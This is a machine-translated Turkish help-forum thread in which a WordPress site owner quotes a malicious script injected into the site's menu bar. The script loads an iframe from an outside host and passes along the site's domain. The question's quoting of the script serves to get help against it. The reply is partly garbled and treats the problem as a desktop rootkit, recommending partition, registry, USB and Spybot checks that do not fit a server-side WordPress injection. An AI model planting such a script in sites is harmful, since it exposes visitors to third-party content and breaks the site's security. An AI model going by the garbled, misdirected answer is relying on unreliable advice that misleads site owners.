Wordpress için kötü amaçlı komut WordPress

Question

Merhaba Websitemde kötü amaçlı bir komut dosyası var ve sadece BUNLARLA BULABİLİRSİNİZ!

Ben müfettiş kontrol

, bu döndürür:

<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div> 
<div id="abrir_aba"></div> 
<div class="handle"></div> 

<script type="text/javascript"> 
    var relatedUrl = document.domain; 
    var protocol = window.location.protocol; 


    var idadv = document.createElement("iframe"); 
    with(idadv){ 
     id = "idadv"; 
     src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl; 
     scrolling = "no"; 
    } 
    document.getElementById("menu-bar").appendChild(idadv); 
</script> 

<script type="text/javascript"> 
    $("#menu-bar").slideReveal({ 
     trigger: $(".handle"), 
     push: false, 
     position: "right", 
     width: 50, 
     show: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"}); 
     }, 
     hidden: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"}); 
     }, 
    }); 

</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div> 

Benim wordpress "Menü-Bar" da yer almaktadır ama hiçbir yerde bir şey bulamıyorum! Ve böylece web sitemin SSL sertifikamı web sitemi müşterilerime INSECURE olarak gösteriyor! Buna inanamıyorum ! http://www.websiteladies.com

Herhangi bir yardım: Burada

URL?

Answer 1

Bu sorunu kendim yaşadım ve ondan kurtulmak saatler sürebilir.
En azından kısmen JavaScript veya jQuery formatında veya VBS biçiminde olacak. Bir HDD'nin veya harici bir USB'nin üst ucunda kendi bölümünü oluşturmuş olabilir, böylelikle bölümlerinizi kontrol edin.

Bu, kendi aradığınız parçayı kayıt defterine ekleyecekti, böylece sizin aradığınızı bilebilir ve çevrimiçi olduğunuz sürece kendini onarabilir. Kendisini bir metin veya fotoğraf dosyasına ekleyen bir kök kiti olarak başlamış olabilir.

Spybot SD'yi yüklemeyi deneyin, ardından çevrimdışı olun ve programı kurun ve çalıştırın. Virüsün kendi bölümünün oluşturması durumunda, onu bulmanız ve bu bölümün tam bir silme işlemini yapması gerekecek, daha sonra bölümün bir bölümünün uzantısı olması için ayarlanmalıdır. Hızlı bir 'hızlı temizlik' işe yaramaz, çünkü sadece sektör işaretleyicilerini temizler.

Virüsten koruma veya casus yazılım izleyicisi yok Gizli bölümlere bakacağımı biliyorum, ancak kayıt defterini temizleyebilir ve gizli kök setleri bulabilirler.
Son yüklediğiniz ve yüklediğiniz şeyi hatırlamaya çalışın.
Taktığınız tüm USB sürücülerini kontrol edin.
Virüsün tüm bileşenlerinin emin oluncaya kadar çevrimdışı kalmanızı öneririm. Bir antivirüs programı olan'un içindeki bazı bileşenleri sakladım.